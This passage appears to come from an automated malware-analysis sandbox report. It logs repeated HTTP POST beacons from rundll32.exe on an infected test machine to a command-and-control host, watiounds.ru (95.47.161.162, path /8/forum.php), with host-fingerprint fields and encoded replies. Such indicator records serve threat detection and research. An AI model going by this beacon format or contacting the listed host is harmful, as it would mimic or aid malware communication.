                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:40.153162956 CEST | 221 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNKPMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          167 | 192.168.2.22 | 49332 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:40.474637032 CEST | 222 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:40.602092981 CEST | 222 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:40 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 51 4a 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBQJYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          168 | 192.168.2.22 | 49333 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:40.933681965 CEST | 223 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:41.074187994 CEST | 223 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          169 | 192.168.2.22 | 49334 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:41.391406059 CEST | 224 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:41.515707016 CEST | 224 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 59 42 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQYBJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          17 | 192.168.2.22 | 49182 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:20:32.946449995 CEST | 48 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:20:33.073031902 CEST | 48 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:20:33 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 56 45 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBVEYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          170 | 192.168.2.22 | 49335 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:41.844995975 CEST | 225 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:41.970844030 CEST | 226 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:41 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 46 55 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNFUMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          171 | 192.168.2.22 | 49336 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:42.295799971 CEST | 226 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:42.420178890 CEST | 227 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 47 54 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYGTBARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          172 | 192.168.2.22 | 49337 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:42.747580051 CEST | 228 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:42.870292902 CEST | 228 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:42 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 42 59 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMBYNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          173 | 192.168.2.22 | 49338 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:43.176161051 CEST | 229 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:43.301805019 CEST | 229 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 59 42 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCYBXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          174 | 192.168.2.22 | 49339 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:43.635279894 CEST | 230 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:43.775443077 CEST | 230 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:43 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZMNAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          175 | 192.168.2.22 | 49340 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:44.096007109 CEST | 231 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:44.223536015 CEST | 231 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMTGNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          176 | 192.168.2.22 | 49341 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:44.540931940 CEST | 232 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:44.663372993 CEST | 232 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:44 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 42 41 5a 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cBAZYARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          177 | 192.168.2.22 | 49342 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:44.979255915 CEST | 233 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:45.102582932 CEST | 233 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 41 5a 41 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cAZAZARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          178 | 192.168.2.22 | 49343 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:45.415364027 CEST | 234 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:45.536503077 CEST | 235 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4d 4a 51 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cMJQNARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          179 | 192.168.2.22 | 49344 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:45.848030090 CEST | 235 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:45.972980022 CEST | 236 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:45 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4b 48 53 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cKHSPARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          18 | 192.168.2.22 | 49183 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:20:48.141587973 CEST | 50 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:20:48.266045094 CEST | 51 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:20:48 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 41 5a 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNAZMARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          180 | 192.168.2.22 | 49345 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:46.299103022 CEST | 236 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:46.428222895 CEST | 237 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 42 59 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZBYAARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          181 | 192.168.2.22 | 49346 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:46.735956907 CEST | 237 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:46.862986088 CEST | 238 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:46 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQZAJARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          182 | 192.168.2.22 | 49347 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:47.178822041 CEST | 239 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:47.304533958 CEST | 239 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cGMNTARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          183 | 192.168.2.22 | 49348 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:47.634949923 CEST | 240 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:47.763469934 CEST | 240 | IN | HTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:47 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 51 4a 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCQJXARRABw==0


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          184 | 192.168.2.22 | 49349 | 95.47.161.162 | 80 | C:\Windows\SysWOW64\rundll32.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Apr 29, 2021 08:22:48.085555077 CEST | 241 | OUT | POST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:48.207855940 CEST | 241 | IN | HTTP/1.1 200 OK
